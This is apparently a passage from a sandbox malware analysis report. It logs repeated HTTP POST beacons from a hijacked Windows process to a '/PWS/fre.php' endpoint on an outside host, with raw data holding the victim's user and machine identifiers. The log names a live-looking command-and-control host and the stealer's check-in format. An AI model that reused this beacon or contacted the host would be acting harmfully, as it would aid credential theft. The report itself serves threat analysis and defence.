Apr 6, 2024 09:30:03.727606058 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:04.092643023 CEST	611	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FnbBAHyLkNOa5aqaydUam3%2FqYL0RVYkIE%2FT%2FZ0HaPYUW40HU%2BVe714USuW2KmOxUR9lDD6xMkWn2z4%2BdZR51G%2FRyH72EcElJYtI7%2FiTT9nZffFNmQzDLg0fgMzZz6UX7ZQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001204ed882888-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	49772	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:04.359603882 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:04.484122038 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:04.861344099 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L615XcJZzDjYWsDyeEgRwPSvL6Y%2BbVMflTcRRU55lDMYRlGtceuRXOyPNKwqBoq1ABo6ysrPk%2FhkOevMZQepszfbz%2BD%2FCPJnufiUbDCuzzUjy341%2BYDOACi8N8rIVJ%2BDFg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001209ac917439-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	49773	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:05.124910116 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:05.251928091 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:05.618626118 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lYUfNWE9jn77%2FHjF8X385rySiz22PqC%2B72Je0N5%2Bh6MIFlNgB3xuG2cY2fpFicqrlnVyp5o08nOuUVBwlzhROfeDeFMZYqUDjEEgLLdvxi5xZYMA%2B4xct1nP2ZHTvvjXHA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700120e6d3c129b-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	49774	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:05.891669989 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:06.015583992 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:06.400134087 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NimoAg5%2FXiHvIjDn36mo3FbjFSaCQZylxerow2D5WawNSqHV7aZGE%2BCax38sidzkjrJIHIt6KjSzLr1nw4pC8XSqIdASTD%2BodHDg1hM%2Bm5BTQS35XeY0wHpHCVjiSEe5Ig%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012133c096daa-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	49775	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:06.739588022 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:06.863511086 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:07.233756065 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HuBs%2BMAjusuFC9hlOM%2FgdevH1WY7J6eKDwKg%2Fr2VOcnLZFXqjQWjnwMpGYtoeCkYbHfrI6Ixp%2Bfs4X6VGbKni%2BmBpbacA8q9Wj4XVC94rLep8DtiTE0n91WKBRYeChyswQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012188ee331dd-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	49776	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:08.980640888 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:09.105062008 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:09.486944914 CEST	599	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2sCxI5p9GUnTa7ie2%2FFTUAgDnK5qhWBtsKRKsw040rsUoCMIptGdjfRVSeTRxy78sWigCOzaTAZMaMftGRWKhSmLRTMqjsuGqZCx9eeIZ61PEogv%2FeOksjNnvdnrrW8RYA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700122689be5c6a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	49777	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:09.757970095 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:09.882371902 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:10.268945932 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AOQjZT72Pgr7tI4uRS3BFLOwEu%2FeI5%2Bzid0AXoCaoSvWNkweeNCTYDPl1IXDe%2FqJlHDBK2ZrFQvZC2g1GJrH%2FIX9vVxZlHzCMVUsO3ZPssSO8gGFIeNRkJ8Q5wFJ%2FSTLhA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700122b68d331d7-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	49778	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:10.531873941 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:10.655966997 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:11.039398909 CEST	609	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VWOb5u%2FtWkgAotx%2F0Xnp9PKkOXFlDwfDZhkLBy8R8E7hHrMunwr%2F3CPdwdEcgHnvZphyECKCx4bNcIAqhHYjH2pgU%2FSxwplYKYF4Jd%2BfbxLgyKvBJspwLsDmkRi%2F%2BZDjWw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700123038cd8758-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	49780	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:11.314148903 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:11.438782930 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:11.828299999 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mytn67HKjgDtNSnsaZOdNxbAUD%2FU5TFPPqbO3EcBztzTVx6ENviHDwUw8O5MHOO%2FYw2F0d7dqa8%2F0bVWWh2CmKq8GyGn2ykc3itT0NkElCAn620jVM8xzhAbdGICIvW2Lw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012351d1d5c63-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	49781	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:12.096910954 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:12.221122026 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:12.595292091 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A8Z%2Bjw9qnFhRS5obRmBFjKkAROo3NIH35VEDQmwujDqmgFnsx8H2DUaYEYw8p5HCyFygpRnQFd3%2BQHcl8741itJtbB3lxiLhgAwMHtbPzoiI1yz%2FY6dzbdxD3NpXnZRT0g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001239fe0f0a1a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	49782	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:12.861150980 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:12.985090017 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:13.376586914 CEST	599	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MfweIPOFJwhX9ErS8cZ1UEfcKRp7YDs9K%2BoWEaRUHfCQxx%2BzcayEHeEy9WKZKrgoRQQV1y0AaTc5yg7uaTjCpljdl8B0I57gmTrDL6NsFsXCdNhIAjkLzEkPzxOPPjTPkA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700123eca7325be-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	49784	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:13.652600050 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:13.776787043 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:14.150090933 CEST	613	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LZYuTJcuhe0PhyTk8GdhASc8gDIQ%2F8c3%2Bk3w4cwhroM2oIPxwE7%2BGbY00I8e3%2B2Kg7TpTYkr6GtInb%2F3%2F60OOC2BuEm0pCj1w84dSpkSu1ecpDhuRYgsGj7%2Fl%2BizFI%2B7tA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001243b88c2248-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	49785	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:14.423119068 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:14.548338890 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:14.937064886 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oEzP9xn%2FY5kau4iQsTH9PXGrlSAw0f5WCdPdPmulAqU0c4TWV16AA5ubpMqdFN5zvLmyaJDzLWM979U715FzdfaCCFAK%2B5ky%2BfqCsLQaSSA501yhiwz5NAj1ANa5GedmtQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012488ab1a4d3-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	49786	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:15.205071926 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:15.329281092 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:15.706084967 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YjJwvUElWxyjGKnq9Ky7wxyXMg4u0mTfawc9Ijcwhe1yUpqml2v4t6UhDZRYiMmmzcVNOxS%2Bdqa0rofL%2BoQh4Sf32zWlcdijIIK4kOpADoG4RD6%2FnCBcZS%2BqfRkHGNGjAw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700124d6e7fda83-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.6	49787	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:15.972978115 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:16.109186888 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:16.844116926 CEST	597	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qt2v6rNNDN8wBhQ0T2ngmJkpzLosI%2FXQqh764gGYFihJO3JuK0r02n2zcAxP4ZiI0J3kmyB5zk2T5onYagRMIHiqMrkXDbkyroao3IkFFQbvR2H5megjvCwHEhvzUfm1SQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012524cdadaa9-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.6	49788	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:17.112020969 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
